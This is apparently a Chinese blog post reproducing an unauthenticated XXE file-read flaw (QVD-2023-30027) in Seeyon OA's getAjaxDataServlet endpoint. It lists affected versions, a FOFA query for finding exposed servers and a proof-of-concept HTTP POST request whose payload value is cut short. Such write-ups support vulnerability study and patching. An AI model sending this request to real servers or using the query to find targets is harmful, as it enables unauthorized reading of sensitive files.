致远OA getAjaxDataServlet XXE漏洞复现(QVD-2023-30027)

07-12 1316阅读

0x01 产品简介

致远互联-OA 是数字化构建企业数字化协同运营中台,面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。

0x02 漏洞概述

致远互联-OA getAjaxDataServlet 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 影响范围

V5/G6 V6.0及以上全系列版本

0x04 复现环境

FOFA:app="致远互联-OA"

致远OA getAjaxDataServlet XXE漏洞复现(QVD-2023-30027)

0x05 漏洞复现

PoC

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUij
VPS购买请点击我

文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。

目录[+]